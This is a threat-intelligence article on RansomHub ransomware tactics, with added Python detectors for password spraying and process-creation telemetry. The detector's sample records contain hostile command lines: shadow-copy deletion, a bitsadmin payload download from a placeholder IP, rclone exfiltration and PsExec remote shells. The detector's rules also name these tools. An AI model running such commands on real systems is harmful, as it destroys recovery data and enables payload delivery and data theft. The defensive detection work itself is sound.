RansomHub operates as a Ransomware-as-a-Service (RaaS) platform: the core operators supply the ransomware and the leak infrastructure, and affiliates carry out the intrusions using both commodity malware and well-established adversarial techniques. Initial access is typically gained through phishing campaigns or exploitation of n-day vulnerabilities (known, already-patched flaws) using publicly available proof-of-concept (PoC) code. Password spraying and credential stuffing against exposed authentication services are also used to breach network defenses.
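The password-spraying pattern mentioned above has a characteristic shape in logon telemetry: one source tries a small number of passwords against many accounts, staying under per-account lockout thresholds. The following is an added example, not code from the original article, that detects that shape over Windows Security event 4625 (logon failure) records. The sample events are constructed, and the field names (`time`, `user`, `ip`) are a simplified stand-in for the real EventData fields (TimeCreated, TargetUserName, IpAddress).

```python
"""Password-spray detection over Windows Security event 4625 (logon failure).

Added example, not from the original article. Real events carry these
fields in EventData (TargetUserName, IpAddress, TimeCreated); the records
below are constructed for illustration.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_4625 = [  # constructed sample events
    # one source, one guess per account, many accounts in seconds: a spray
    {"time": "2024-09-01T08:00:01", "user": "alice", "ip": "203.0.113.5"},
    {"time": "2024-09-01T08:00:03", "user": "bob",   "ip": "203.0.113.5"},
    {"time": "2024-09-01T08:00:05", "user": "carol", "ip": "203.0.113.5"},
    {"time": "2024-09-01T08:00:07", "user": "dave",  "ip": "203.0.113.5"},
    {"time": "2024-09-01T08:00:09", "user": "erin",  "ip": "203.0.113.5"},
    {"time": "2024-09-01T08:00:11", "user": "frank", "ip": "203.0.113.5"},
    # one user mistyping their own password: many failures, one account
    {"time": "2024-09-01T08:05:00", "user": "grace", "ip": "198.51.100.7"},
    {"time": "2024-09-01T08:05:10", "user": "grace", "ip": "198.51.100.7"},
    {"time": "2024-09-01T08:05:20", "user": "grace", "ip": "198.51.100.7"},
    {"time": "2024-09-01T08:05:30", "user": "grace", "ip": "198.51.100.7"},
    # five accounts but spread over two hours: outside the default window
    {"time": "2024-09-01T09:00:00", "user": "alice", "ip": "192.0.2.9"},
    {"time": "2024-09-01T09:30:00", "user": "bob",   "ip": "192.0.2.9"},
    {"time": "2024-09-01T10:00:00", "user": "carol", "ip": "192.0.2.9"},
    {"time": "2024-09-01T10:30:00", "user": "dave",  "ip": "192.0.2.9"},
    {"time": "2024-09-01T11:00:00", "user": "erin",  "ip": "192.0.2.9"},
]


def detect_password_spray(events, window_minutes=10, min_accounts=5):
    """Map each source IP that failed logons against >= min_accounts distinct
    accounts inside any window of `window_minutes` to the full sorted set of
    accounts it touched.

    The spray signature is many accounts per source with few attempts each,
    which keeps each account below lockout thresholds. A brute force against
    a single account (many failures, one user) is deliberately not matched;
    that needs a separate per-account rule.
    """
    window = timedelta(minutes=window_minutes)
    attempts = defaultdict(list)
    for ev in events:
        attempts[ev["ip"]].append((datetime.fromisoformat(ev["time"]), ev["user"]))

    hits = {}
    for ip, tries in attempts.items():
        tries.sort()  # by timestamp
        start = 0
        for end in range(len(tries)):
            # slide the left edge until the window spans at most `window`
            while tries[end][0] - tries[start][0] > window:
                start += 1
            if len({u for _, u in tries[start:end + 1]}) >= min_accounts:
                hits[ip] = sorted({u for _, u in tries})
                break
    return hits


if __name__ == "__main__":
    for ip, users in detect_password_spray(SAMPLE_4625).items():
        print(f"spray from {ip}: {len(users)} accounts ({', '.join(users)})")
```

The slow-and-low source (192.0.2.9) is only caught when the window is widened, which is the usual tuning trade-off: a wide window catches patient sprays but raises the false-positive rate on shared egress IPs such as VPN concentrators, so correlate with logon type and whether the targeted accounts actually exist.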
To evade detection, the ransomware binary may be renamed to resemble legitimate software, log entries and related data are cleared, and security software is disabled through Windows Management Instrumentation (WMI). Once inside the network, the actors move laterally with VNC, RDP and PsExec, spreading to additional hosts and reaching more privileged accounts along the way. Before encryption they typically delete volume shadow copies on Windows systems with vssadmin.exe so that encrypted data cannot be restored from local snapshots.

RansomHub affiliates use several methods for data exfiltration. These include PuTTY for SSH-based file transfers (SFTP/SCP) as well as unencrypted protocols to push data to AWS S3 buckets or other cloud storage. Additional tools observed include:
- BITSAdmin for background file transfers
- Cobalt Strike for post-exploitation
- Rclone and WinSCP for moving files
- Mimikatz and CrackMapExec (NetExec) for credential harvesting and lateral movement
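The evasion, lateral-movement, recovery-inhibition and exfiltration behaviours described above all leave process-creation events behind. The following is an added example, not code from the original article or from any vendor, that triages Sysmon Event ID 1 (ProcessCreate) style records for those behaviours. It keys on the PE's OriginalFileName rather than the on-disk name, so a renamed tool is still recognised and the rename itself is flagged. The records, the simplified field names (`image`, `orig`, `cmd`, `parent`) and the command-line shapes are constructed illustrations of commonly reported usage, not an exhaustive signature set.

```python
"""Triage Windows process-creation telemetry for RansomHub-style TTPs.

Added example; not code from the original article or from any vendor.
Each record mimics a Sysmon Event ID 1 record: Image (full path),
OriginalFileName (from the PE version resource), CommandLine, ParentImage.
The sample records are constructed.
"""
import re
from pathlib import PureWindowsPath


def binary_name(ev):
    """Effective binary identity. Prefer the compiled-in OriginalFileName so a
    renamed copy is still recognised; fall back to the on-disk file name.
    Assumption: the binary carries a version resource. Some Go builds do not,
    in which case an import hash or file hash is the fallback."""
    return (ev.get("orig") or PureWindowsPath(ev["image"]).name).lower()


def is_renamed(ev):
    """True when the on-disk name disagrees with the compiled-in name.
    In production keep an allowlist: a few legitimate binaries ship with a
    mismatching OriginalFileName."""
    orig = ev.get("orig")
    if not orig:
        return False
    return PureWindowsPath(orig).stem.lower() != PureWindowsPath(ev["image"]).stem.lower()


# (label, predicate). Command shapes are assumptions about typical usage.
RULES = [
    ("impact: shadow copies deleted (vssadmin)",
     lambda ev: binary_name(ev) == "vssadmin.exe"
     and re.search(r"delete\s+shadows", ev["cmd"], re.I)),
    ("impact: shadow copies deleted (WMI)",
     lambda ev: binary_name(ev) == "wmic.exe"
     and re.search(r"shadowcopy\s+delete", ev["cmd"], re.I)),
    ("exfiltration: BITS transfer",
     lambda ev: binary_name(ev) == "bitsadmin.exe" and "/transfer" in ev["cmd"].lower()),
    ("exfiltration: rclone copy/sync/move",
     lambda ev: binary_name(ev) == "rclone.exe"
     and re.search(r"\b(copy|sync|move)\b", ev["cmd"], re.I)),
    # Sysinternals PsExec reports OriginalFileName 'psexec.c' (assumption:
    # current builds still do).
    ("lateral movement: PsExec",
     lambda ev: binary_name(ev) in ("psexec.exe", "psexec64.exe", "psexec.c")),
    ("defense evasion: renamed executable", is_renamed),
]


def triage(events):
    """Return, per event, the list of matching labels (empty when benign)."""
    return [[label for label, hit in RULES if hit(ev)] for ev in events]


SAMPLE_EVENTS = [  # constructed sample records
    {"image": r"C:\Windows\System32\vssadmin.exe", "orig": "VSSADMIN.EXE",
     "cmd": "vssadmin.exe delete shadows /all /quiet",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe", "orig": "wmic.exe",
     "cmd": "wmic shadowcopy delete", "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\bitsadmin.exe", "orig": "bitsadmin.exe",
     "cmd": r"bitsadmin.exe /transfer job /download /priority high "
            r"http://203.0.113.50/t.exe C:\Users\Public\t.exe",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Users\Public\svchost.exe", "orig": "rclone.exe",  # renamed rclone
     "cmd": r"svchost.exe copy C:\Finance remote:bucket --transfers 8",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Tools\PsExec.exe", "orig": "psexec.c",
     "cmd": r"PsExec.exe \\FILESRV01 -s cmd.exe", "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\notepad.exe", "orig": "NOTEPAD.EXE",
     "cmd": r"notepad.exe C:\Users\alice\notes.txt", "parent": r"C:\Windows\explorer.exe"},
]


if __name__ == "__main__":
    for ev, labels in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(ev["image"], "->", labels or "benign")
```

The renamed-rclone record is the case worth noting: a rule keyed on the on-disk name `svchost.exe` would miss it entirely, while keying on OriginalFileName produces both the exfiltration hit and the rename hit. Mimikatz and NetExec are not covered here because they are more reliably caught by LSASS-access events (Sysmon Event ID 10) and SMB authentication patterns than by command lines.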
The double-extortion scheme is central to RansomHub's operation. Exfiltrated data serves as leverage to force victims into paying the ransom: if payment is not received within the stated deadline, the stolen data is published on RansomHub's Tor-based leak site. This adds reputational damage to the operational disruption caused by encryption, and it means that restoring from backups alone does not end the extortion.